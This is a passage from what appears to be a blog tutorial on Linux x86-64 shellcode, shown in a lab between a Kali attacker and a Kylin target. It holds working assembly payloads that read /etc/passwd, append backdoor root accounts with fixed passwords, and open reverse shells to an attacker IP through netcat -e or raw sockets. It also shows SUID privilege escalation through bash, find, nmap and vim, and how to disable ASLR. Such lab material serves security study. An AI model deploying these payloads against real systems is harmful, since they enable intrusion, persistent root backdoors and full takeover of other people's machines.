class="line"></span><br><span class="line">_start:</span><br><span class="line"></span><br><span class="line"> xor rax, rax ; Zeroes out RAX.</span><br><span class="line"> xor rbp, rbp ; Zeroes out RBP.</span><br><span class="line"></span><br><span class="line"> push rax ; Pushes RAX's NULL-QWORD.</span><br><span class="line"></span><br><span class="line"> mov rbp, 0x6477737361702f63 ; Moves value "dwsspa/c" into RBP.</span><br><span class="line"> push rbp ; Pushes the value of RBP into the Stack.</span><br><span class="line"></span><br><span class="line"> mov rbp, 0x74652f2f2f2f2f2f ; Moves value "te//////" into RBP.</span><br><span class="line"> push rbp ; Pushes the value of RBP into the Stack.</span><br><span class="line"></span><br><span class="line"> mov rbp, rsp ; Copies the value of the Stack into RBP (RBP -> "//////etc/passwd").</span><br><span class="line"> push rax ; Pushes RAX's NULL-QWORD.</span><br><span class="line"></span><br><span class="line"> mov rbx, 0x7461632f6e69622f ; Moves value "tac/nib/" into RBX.</span><br><span class="line"> push rbx ; Pushes the value of RBX into the Stack.</span><br><span class="line"></span><br><span class="line"> mov rbx, rsp ; Copies the value of the Stack into RBX (RBX -> "/bin/cat").</span><br><span class="line"></span><br><span class="line"> mov rdi, rsp ; Copies the value of the Stack into RDI (RDI -> "/bin/cat", the path argument of execve).</span><br><span class="line"> push rax ; Pushes RAX's NULL-QWORD.</span><br><span class="line"></span><br><span class="line"> mov rdx, rsp ; Copies the value of the Stack into RDX. RSP points at the NULL-QWORD just pushed, so RDX = envp = an empty environment list.</span><br><span class="line"></span><br><span class="line"> push rbp ; Pushes the value of RBP into the Stack.</span><br><span class="line"> push rbx ; Pushes the value of RBX into the Stack. 
The full string should be "cat /etc/passwd".</span><br><span class="line"></span><br><span class="line"> mov rsi, rsp ; RSI = RSP = argv: the pointers to "/bin/cat" and "//////etc/passwd", followed by NULL.</span><br><span class="line"></span><br><span class="line"> push word 59 ; Pushes the value 59 (syscall value for execve in the x64 format).</span><br><span class="line"> pop ax ; Pops this value into AX so there are no NULLs.</span><br><span class="line"> syscall ; The syscall is executed.</span><br></pre></td></tr></table></figure><h3 id="系统调用读取"><a class="markdownIt-Anchor" href="#系统调用读取"></a> Reading via syscalls</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span 
class="line">43</span><br></pre></td><td class="code"><pre><span class="line">; readPasswd.asm</span><br><span class="line">global _start</span><br><span class="line">section .text</span><br><span class="line"></span><br><span class="line">_start:</span><br><span class="line">jmp _push_filename</span><br><span class="line"> </span><br><span class="line">_readfile:</span><br><span class="line">; syscall open, number 0x2</span><br><span class="line">; open('/etc/passwd', O_RDONLY), flags = 0 (rsi is zeroed below)</span><br><span class="line">pop rdi ; pop path value (pushed as the return address by the call below)</span><br><span class="line">xor rax, rax</span><br><span class="line">add al, 2</span><br><span class="line">xor rsi, rsi ; flags = 0 = O_RDONLY</span><br><span class="line">syscall</span><br><span class="line"> </span><br><span class="line">; syscall read, number 0x0</span><br><span class="line">; read(fd, buf, 0xfff), rdi = rax = fd (open's return value)</span><br><span class="line">sub sp, 0xfff ; reserve a 0xfff-byte buffer on the stack (16-bit sub: only the low 16 bits of rsp change, which keeps the encoding null-free)</span><br><span class="line">lea rsi, [rsp]</span><br><span class="line">mov rdi, rax</span><br><span class="line">xor rdx, rdx</span><br><span class="line">mov dx, 0xfff; size to read</span><br><span class="line">xor rax, rax</span><br><span class="line">syscall</span><br><span class="line"> </span><br><span class="line">; syscall write to stdout, number 0x1</span><br><span class="line">; write(1, buf, bytes_read), where bytes_read is the rax returned by read</span><br><span class="line">xor rdi, rdi</span><br><span class="line">inc rdi ; set stdout fd = 1</span><br><span class="line">mov rdx, rax</span><br><span class="line">xor rax, rax</span><br><span class="line">inc rax</span><br><span class="line">syscall</span><br><span class="line"> </span><br><span class="line">; syscall exit, number 60</span><br><span class="line">xor rax, rax</span><br><span class="line">add al, 60</span><br><span class="line">syscall</span><br><span class="line"> </span><br><span class="line">_push_filename:</span><br><span class="line">call _readfile ; pushes the address of path, which _readfile pops into rdi</span><br><span class="line">path: db 
"/etc/passwd"</span><br></pre></td></tr></table></figure><h2 id="42-写入-passwd"><a class="markdownIt-Anchor" href="#42-写入-passwd"></a> 4.2 Writing passwd</h2><h3 id="0x1-2"><a class="markdownIt-Anchor" href="#0x1-2"></a> 0x1</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span 
class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br></pre></td><td class="code"><pre><span class="line">; addRootUser.asm</span><br><span class="line">; Note: requires root privileges</span><br><span class="line">; Action: Adds a user into /etc/passwd with the following information</span><br><span class="line">; username: toor</span><br><span class="line">; password: toor</span><br><span class="line">; uid: 0</span><br><span class="line">; gid: 0</span><br><span class="line">; home: /root</span><br><span class="line">; shell: /bin/sh</span><br><span class="line">;</span><br><span class="line">; toor:sXuCKi7k3Xh/s:0:0::/root:/bin/sh</span><br><span class="line"></span><br><span class="line">global _start</span><br><span class="line"></span><br><span class="line">section .text</span><br><span class="line"></span><br><span class="line">_start:</span><br><span class="line">jmp _push_filename</span><br><span class="line"></span><br><span class="line">; #define __NR_open 2</span><br><span class="line">; int open(const char *pathname, int flags);</span><br><span class="line">; rax -> 2</span><br><span class="line">; rdi -> /etc/passwd</span><br><span class="line">; rsi -> 0x401</span><br><span class="line">;</span><br><span class="line">; >>> hex(os.O_WRONLY ^ os.O_APPEND)</span><br><span class="line">; 0x401</span><br><span class="line">_openfile:</span><br><span class="line">pop rdi ; rdi -> /etc/passwd</span><br><span class="line">xor rax, rax</span><br><span class="line">xor rsi, rsi ; rsi to zero</span><br><span class="line">mov si, 0x401 ; rsi -> O_WRONLY|O_APPEND</span><br><span class="line">add al, 
0x2 ; rax -> 2 (open)</span><br><span class="line">syscall ; open</span><br><span class="line"></span><br><span class="line">xchg rdi, rax ; save returned fd</span><br><span class="line">jmp short get_entry_address ; start jmp-call-pop</span><br><span class="line"></span><br><span class="line">write_entry:</span><br><span class="line">; #define __NR_write 1</span><br><span class="line">; ssize_t write(int fd, const void *buf, size_t count);</span><br><span class="line">; rax -> 1</span><br><span class="line">; rdi -> results of open syscall</span><br><span class="line">; rsi -> user's entry</span><br><span class="line">; rdx -> len of user's entry</span><br><span class="line">pop rsi ; end jmp-call-pop, rsi -> user's entry</span><br><span class="line">push 0x1</span><br><span class="line">pop rax ; rax -> 1</span><br><span class="line">push 38 ; length + 1 for newline</span><br><span class="line">pop rdx ; rdx -> length of user's entry</span><br><span class="line">syscall ; write</span><br><span class="line"></span><br><span class="line">; #define __NR_exit 60</span><br><span class="line">; void _exit(int status);</span><br><span class="line">; rax -> 60</span><br><span class="line">; rdi -> don't care</span><br><span class="line">push 60</span><br><span class="line">pop rax</span><br><span class="line">syscall ; OS will handle closing fd at exit</span><br><span class="line"></span><br><span class="line">get_entry_address:</span><br><span class="line">call write_entry</span><br><span class="line">user_entry: db "toor:sXuCKi7k3Xh/s:0:0::/root:/bin/sh",0xa</span><br><span class="line"></span><br><span class="line">_push_filename:</span><br><span class="line">call _openfile</span><br><span class="line">path: db "/etc/passwd"</span><br></pre></td></tr></table></figure><h3 id="0x2-2"><a class="markdownIt-Anchor" href="#0x2-2"></a> 0x2</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span 
class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span 
class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br></pre></td><td class="code"><pre><span class="line">; addRootUser_tor.asm</span><br><span class="line">; Note: requires root privileges</span><br><span class="line">;Purpose: adds user "t0r" with password "Winner" to /etc/passwd</span><br><span class="line">;executed syscalls: setreuid, setregid, open, write, close, exit</span><br><span class="line">;Result: t0r:3UgT5tXKUkUFg:0:0::/root:/bin/bash</span><br><span class="line">;syscall op codes: /usr/include/x86_64-linux-gnu/asm/unistd_64.h</span><br><span class="line"></span><br><span class="line">section .text</span><br><span class="line">global _start</span><br><span class="line">_start:</span><br><span class="line"> ;sys_setreuid(uint ruid, uint euid)</span><br><span class="line"> xor rax, rax</span><br><span class="line"> mov al, 113 ;syscall sys_setreuid</span><br><span class="line"> xor rdi, rdi ;arg 1 (rdi on x86-64) -- set real uid to root</span><br><span class="line"> mov rsi, rdi ;arg 2 (rsi on x86-64) -- set effective uid to root</span><br><span class="line"> syscall</span><br><span class="line"> </span><br><span class="line"> ;sys_setregid(uint rgid, uint egid)</span><br><span class="line"> xor rax, rax</span><br><span class="line"> mov al, 114 ;syscall sys_setregid</span><br><span class="line"> xor rdi, rdi ;arg 1 (rdi) -- set real gid to root</span><br><span class="line"> mov rsi, rdi ;arg 2 (rsi) -- set effective gid to root</span><br><span class="line"> syscall</span><br><span class="line"> 
</span><br><span class="line"> ;push all strings on the stack prior to file operations.</span><br><span class="line"> xor rbx, rbx</span><br><span class="line"> mov ebx, 0x647773FF</span><br><span class="line"> shr rbx, 8</span><br><span class="line"> push rbx ;string \00dws</span><br><span class="line"> mov rbx, 0x7361702f6374652f</span><br><span class="line"> push rbx ;string sap/cte/</span><br><span class="line"> mov rbx, 0x0A687361622F6EFF</span><br><span class="line"> shr rbx, 8</span><br><span class="line"> push rbx ;string \00\nhsab/n</span><br><span class="line"> mov rbx, 0x69622F3A746F6F72</span><br><span class="line"> push rbx ;string ib/:toor</span><br><span class="line"> mov rbx, 0x2F3A3A303A303A67</span><br><span class="line"> push rbx ;string /::0:0:g</span><br><span class="line"> mov rbx, 0x46556B554B587435</span><br><span class="line"> push rbx ;string FUkUKXt5</span><br><span class="line"> mov rbx, 0x546755333A723074</span><br><span class="line"> push rbx ;string TgU3:r0t</span><br><span class="line"> </span><br><span class="line"> ;prelude to doing anything useful...</span><br><span class="line"> mov rbx, rsp ;save stack pointer for later use</span><br><span class="line"> push rbp ;store base pointer to stack so it can be restored later</span><br><span class="line"> mov rbp, rsp ;set base pointer to current stack pointer</span><br><span class="line"> </span><br><span class="line"> ;sys_open(char* fname, int flags, int mode)</span><br><span class="line"> sub rsp, 16</span><br><span class="line"> mov [rbp - 16], rbx ;store pointer to "t0r..../bash"</span><br><span class="line"> mov si, 0x0401 ;arg 2 -- flags</span><br><span class="line"> mov rdi, rbx</span><br><span class="line"> add rdi, 40 ;arg 1 -- pointer to "/etc/passwd"</span><br><span class="line"> xor rax, rax</span><br><span class="line"> mov al, 2 ;syscall sys_open</span><br><span class="line"> syscall</span><br><span class="line"> </span><br><span class="line"> ;sys_write(uint fd, char* 
buf, uint size)</span><br><span class="line"> mov [rbp - 4], eax ;arg 1 -- fd is retval of sys_open. save fd to stack for later use.</span><br><span class="line"> mov rcx, rbx ;arg 2 -- load rcx with pointer to string "t0r.../bash"</span><br><span class="line"> xor rdx, rdx</span><br><span class="line"> mov dl, 39 ;arg 3 -- load rdx with size of string "t0r.../bash\n" (38 chars plus the newline)</span><br><span class="line"> mov rsi, rcx ;arg 2 -- move to source index register</span><br><span class="line"> mov rdi, rax ;arg 1 -- move to destination index register</span><br><span class="line"> xor rax, rax</span><br><span class="line"> mov al, 1 ;syscall sys_write</span><br><span class="line"> syscall</span><br><span class="line"> </span><br><span class="line"> ;sys_close(uint fd)</span><br><span class="line"> xor rdi, rdi</span><br><span class="line"> mov edi, [rbp - 4] ;arg 1 -- load stored file descriptor to destination index register</span><br><span class="line"> xor rax, rax</span><br><span class="line"> mov al, 3 ;syscall sys_close</span><br><span class="line"> syscall</span><br><span class="line"> </span><br><span class="line"> ;sys_exit(int err_code)</span><br><span class="line"> xor rax, rax</span><br><span class="line"> mov al, 60 ;syscall sys_exit</span><br><span class="line"> xor rdi, rdi ;arg 1 (rdi on x86-64) -- exit code 0</span><br><span class="line"> syscall</span><br></pre></td></tr></table></figure><h1 id="5-反向-shell"><a class="markdownIt-Anchor" href="#5-反向-shell"></a> 5. 
Reverse shell</h1><h2 id="50-部署"><a class="markdownIt-Anchor" href="#50-部署"></a> 5.0 Setup</h2><p>[1] First, run the following command on the attacker side (kali: 192.168.188.141).</p><p><img src="/2022/09/06/shellcode-linux-x86-64/image-20220817211511413.png" alt="image-20220817211511413"></p><p>[2] Then run the shellcode on the target (Kylin: 192.168.188.146).</p><h2 id="51-netcat-命令行"><a class="markdownIt-Anchor" href="#51-netcat-命令行"></a> 5.1 netcat command line</h2><p>Because the netcat that ships with Kylin is a stripped-down build without the -e option, we first need to install the full version of netcat. I installed it under /home/sakura/tools/netcat.</p><blockquote><p>Installation guide: <a href="https://www.freebuf.com/sectool/243115.html">This may be the most complete netcat guide</a></p></blockquote><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span 
class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br></pre></td><td class="code"><pre><span class="line">; netcatRevTcp.asm</span><br><span class="line">; Note: the parameters below must be adjusted to the netcat install directory on your machine, and the IP address must be reconfigured too.</span><br><span class="line">;execve("/home/sakura/tools/netcat/src/netcat", ["/home/sakura/tools/netcat/src/ne"..., "-e", "/bin/sh", "192.168.188.141", "5566"], NULL) = 0</span><br><span class="line"></span><br><span class="line">global _start</span><br><span class="line">section .text</span><br><span class="line">_start:</span><br><span class="line"> push rbp</span><br><span class="line"> mov rbp, rsp</span><br><span class="line"> sub rsp, 0x40</span><br><span class="line"> mov qword rax, '5566AAAA' ; the 'A' bytes are placeholders that the xors below turn into NUL terminators</span><br><span class="line">push rax</span><br><span class="line">mov qword rax, '188.141A'</span><br><span class="line">push rax</span><br><span class="line">mov qword rax, '192.168.'</span><br><span class="line">push rax</span><br><span class="line">mov qword rax, '/bin/shA'</span><br><span class="line">push rax</span><br><span class="line">mov qword rax, 'tcatA-eA'</span><br><span class="line">push rax</span><br><span class="line">mov qword rax, 't/src/ne'</span><br><span class="line">push rax</span><br><span class="line">mov qword rax, 'ls/netca'</span><br><span class="line">push rax</span><br><span class="line">mov qword rax, 'kura/too'</span><br><span class="line">push rax</span><br><span class="line">mov qword rax, '/home/sa'</span><br><span class="line">push rax</span><br><span class="line"> </span><br><span class="line"> xor byte [rsp+36], 0x41 ; 'A' ^ 'A' = 0: terminate "...netcat"</span><br><span class="line"> xor 
byte [rsp+39], 0x41 ; terminate "-e"</span><br><span class="line"> xor byte [rsp+47], 0x41 ; terminate "/bin/sh"</span><br><span class="line"> xor byte [rsp+63], 0x41 ; terminate "192.168.188.141"</span><br><span class="line"> xor byte [rsp+71], 0x41</span><br><span class="line"> xor byte [rsp+70], 0x41</span><br><span class="line"> xor byte [rsp+69], 0x41</span><br><span class="line"> xor byte [rsp+68], 0x41 ; terminate "5566"</span><br><span class="line"></span><br><span class="line">xor rax, rax</span><br><span class="line">mov rdi, rsp ; rdi -> "/home/sakura/tools/netcat/src/netcat"</span><br><span class="line">push rax ; argv terminator</span><br><span class="line">lea rbx, [rdi+64] ; "5566"</span><br><span class="line">push rbx</span><br><span class="line">lea rbx, [rdi+48] ; "192.168.188.141"</span><br><span class="line">push rbx</span><br><span class="line">lea rbx, [rdi+40] ; "/bin/sh"</span><br><span class="line">push rbx</span><br><span class="line">lea rbx, [rdi+37] ; "-e"</span><br><span class="line">push rbx</span><br><span class="line">push rdi ; argv[0] = path</span><br><span class="line">mov rsi, rsp ; rsi -> argv</span><br><span class="line">xor rdx, rdx ; envp = NULL</span><br><span class="line"></span><br><span class="line"> add al , 59 ; execve</span><br><span class="line"> syscall</span><br></pre></td></tr></table></figure><h2 id="52-系统调用"><a class="markdownIt-Anchor" href="#52-系统调用"></a> 5.2 System calls</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span 
class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br></pre></td><td class="code"><pre><span class="line">; revTcp.asm</span><br><span class="line">; Note: the IP address on lines 17 and 18 must be reconfigured for the actual environment</span><br><span class="line">; attacker IP: 192.168.188.141</span><br><span class="line">; attacker port: 5566</span><br><span class="line">global _start</span><br><span class="line">section .text</span><br><span class="line">_start:</span><br><span class="line"> ;Socket</span><br><span class="line"> xor rdx, rdx ; zero out rdx (protocol = 0)</span><br><span class="line"> mov rsi, rdx ; rsi = 0</span><br><span class="line"> inc rsi ; rsi = 1 = SOCK_STREAM</span><br><span class="line"> mov rdi, rsi ; rdi = 1</span><br><span class="line"> inc rdi ; rdi = 2 = AF_INET</span><br><span class="line"> add ax, 0x29 ; socket = 41; rax is assumed to already be 0, as it is at ELF entry</span><br><span class="line"> syscall ; call socket(AF_INET, SOCK_STREAM, 0);</span><br><span class="line"></span><br><span class="line"> mov r12, rax ; save the socket fd</span><br><span class="line"> sub 
rsp,0x10</span><br><span class="line"> mov dword [rsp+0x4],0x8dbca8c0; ip = 192.168.188.141 (sin_addr, network byte order)</span><br><span class="line"> mov word [rsp+0x2],0xbe15; port = 5566 (0x15be in network byte order)</span><br><span class="line"> mov word [rsp],0x2 ; sin_family = AF_INET</span><br><span class="line"></span><br><span class="line"> ; Connect = 0x2a</span><br><span class="line"> mov rdi, rax ; move the saved socket fd into rdi</span><br><span class="line"> mov rsi, rsp ; move the saved sock_addr_in into rsi</span><br><span class="line"> add dx, 0x10 ; rdx = sizeof(struct sockaddr_in) = 16</span><br><span class="line"> xor rax, rax </span><br><span class="line"> add ax, 0x2a</span><br><span class="line"> syscall ; call connect(rdi, rsi, rdx)</span><br><span class="line"></span><br><span class="line"> xor rsi, rsi ; zero out rsi (first target fd = stdin)</span><br><span class="line"></span><br><span class="line"> dup:</span><br><span class="line"> xor rax, rax</span><br><span class="line"> add ax, 0x21 ; move the syscall for dup2 into rax</span><br><span class="line"> mov rdi, r12 ; move the FD for the socket into rdi</span><br><span class="line"> syscall ; call dup2(rdi, rsi)</span><br><span class="line"></span><br><span class="line"> cmp rsi, 0x2 ; check whether rsi is still at most 2 (flags are set before the inc below)</span><br><span class="line"> inc rsi ; inc rsi</span><br><span class="line"> jbe dup ; loop while the compared value was <= 2: dup2 runs for fds 0, 1, 2 and once more for 3, which is harmless</span><br><span class="line"></span><br><span class="line"> ;sub r8, 0x1F ; setup the exec syscall at 0x3b</span><br><span class="line"> xor rax, rax </span><br><span class="line"> add ax, 0x3b ; move the syscall into rax</span><br><span class="line"></span><br><span class="line"> ;exec</span><br><span class="line"> xor rdx, rdx ; zero out rdx (envp = NULL)</span><br><span class="line"> mov qword rbx, '//bin/sh' ; '/bin/sh' in hex</span><br><span class="line"> shr rbx,0x8 ; shift right to create the null terminator</span><br><span class="line"> push rbx</span><br><span class="line"></span><br><span class="line"> mov rdi, rsp ; rdi -> "/bin/sh"</span><br><span class="line"> push rdx ; argv terminator</span><br><span class="line"> push rdi ; argv[0] = pointer to "/bin/sh"</span><br>
<span class="line"> mov rsi, rsp ; rsi -> argv</span><br><span class="line"> syscall ; call execve("/bin/sh", argv, NULL)</span><br></pre></td></tr></table></figure><h1 id="6-提权方法"><a class="markdownIt-Anchor" href="#6-提权方法"></a> 6. Privilege escalation methods</h1><h2 id="61-bash"><a class="markdownIt-Anchor" href="#61-bash"></a> 6.1 bash</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">sakura@Kylin:~$ sudo chmod u+s /bin/bash</span><br><span class="line">sakura@Kylin:~$ ll /bin/bash</span><br><span class="line">-rwsr-xr-x 1 root root 1183448 6月 4 2021 /bin/bash*</span><br><span class="line">sakura@Kylin:~$ bash -p</span><br><span class="line">bash-5.0# whoami</span><br><span class="line">root</span><br><span class="line">bash-5.0# id</span><br><span class="line">uid=1000(sakura) gid=1000(sakura) euid=0(root) 组=1000(sakura),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),119(lpadmin),129(sambashare)</span><br><span class="line">bash-5.0# ./addRootUser </span><br><span class="line">bash-5.0# cat /etc/passwd</span><br><span class="line">root:x:0:0:root:/root:/bin/bash</span><br><span class="line">。。。。。。</span><br><span class="line">toor:sXuCKi7k3Xh/s:0:0::/root:/bin/sh</span><br><span class="line">bash-5.0# </span><br></pre></td></tr></table></figure><h2 id="62-nmap"><a class="markdownIt-Anchor" href="#62-nmap"></a> 6.2 nmap</h2><p>Check the nmap version with <code>nmap -v</code>; if the version is between 2.02 and 5.21, it can be used to escalate privileges.</p><figure class="highlight shell"><table><tr><td 
class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">nmap> </span><span class="language-bash">!sh</span></span><br><span class="line">sh-3.2# whoami</span><br><span class="line">root</span><br></pre></td></tr></table></figure><h2 id="63-find"><a class="markdownIt-Anchor" href="#63-find"></a> 6.3 find</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">sakura@Kylin:~$ sudo chmod u+s /bin/find</span><br><span class="line">sakura@Kylin:~$ ll /bin/find</span><br><span class="line">-rwsr-xr-x 1 root root 320160 4月 15 2020 /bin/find*</span><br><span class="line">sakura@Kylin:~/文档$ touch anyfile</span><br><span class="line">sakura@Kylin:~/文档$ find anyfile -exec whoami \;</span><br><span class="line">root</span><br><span class="line">sakura@Kylin:~/文档$ </span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"># enter a shell</span><br><span class="line">sakura@Kylin:~/文档$ find anyfile -exec "/bin/bash" "-p" \;</span><br><span class="line">sh-5.0# whoami</span><br><span class="line">root</span><br></pre></td></tr></table></figure><h2 id="64-vim"><a class="markdownIt-Anchor" href="#64-vim"></a> 6.4 vim</h2><p>The idea behind escalating with vim is to edit the /etc/passwd file and add a user with root privileges for yourself.</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span 
class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">sakura@Kylin:~$ sudo chmod u+s /bin/vim.tiny</span><br><span class="line">sakura@Kylin:~$ vim.tiny /etc/passwd</span><br><span class="line">sakura@Kylin:~$ cat /etc/passwd</span><br><span class="line">root:x:0:0:root:/root:/bin/bash</span><br><span class="line">、、、、</span><br><span class="line">hello</span><br><span class="line">sakura@Kylin:~$ </span><br></pre></td></tr></table></figure><h1 id="7-关闭-aslr"><a class="markdownIt-Anchor" href="#7-关闭-aslr"></a> 7. 关闭 ASLR</h1><p><strong>配置选项</strong></p><ul><li>0 = 关闭</li><li>1 = 半随机。共享库、栈、mmap() 以及 VDSO 将被随机化。(留坑,PIE会影响heap的随机化。。)</li><li>2 = 全随机。除了1中所述,还有heap。</li></ul><p><strong>方法一: 手动修改randomize_va_space文件</strong></p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"># </span><span class="language-bash"><span class="built_in">echo</span> 0 > /proc/sys/kernel/randomize_va_space</span></span><br></pre></td></tr></table></figure><p>注意,这里是先进root权限,后执行。不要问为什么sudo echo 0 > /proc/sys/kernel/randomize_va_space为什么会报错</p><p><strong>方法二: 使用sysctl控制ASLR</strong></p><figure class="highlight 